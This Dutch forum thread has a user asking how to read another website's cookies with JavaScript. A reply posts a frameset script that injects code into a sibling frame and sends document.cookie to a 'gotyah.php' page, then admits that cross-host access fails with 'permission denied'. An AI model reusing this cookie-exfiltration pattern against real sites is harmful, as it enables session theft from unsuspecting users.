Ik wil graag cookies van een andere website inlezen en van Mitch gehoord dat dat met Javascript kan. Weet iemand hoe dat moet? Alvast bedankt ;)
Waneer je uitgaat van een frameset, 'koekje' is het frame met de bezochte pagina, 'monster' is het frame met devolgende code:
<script>
var otherbody = window.parent.koekje.document.getElementsByTagName('body').item(0);
var scripttag = window.parent.koekje.document.createElement('script');
scripttag.innerHTML = 'window.parent.monster.document.location.href = \'gotyah.php?cookie='+escape(document.cookie)+'\'';
otherbody.appendChild(scripttag);
</script>

het 'monster'-frame wordt niet weergegeven. Werkt alleen op pagina's zonder framebuster, en heb zo geen idee hoe je die moet omzeilen. je moet immers een iets met jouw pagina en code hebben om de andere pagina te kunnen besmetten als het ware. Als het mogelijk was om de volgende pagina die erna komt te kunnen bewerken, zou je letterlijk een zichzelf voortplantend stukje code kunnen maken. Maar bij mijn weten kan dat gelukkig niet.

edit: Gelukkig is het niet zo simpel. Je kan niet een pagina van een andere host veranderen via javascript. In mijn javascript-console staat er dan mooi 'permission denied';
er is vast een manier alleen ik ben niet zo slim

Reageren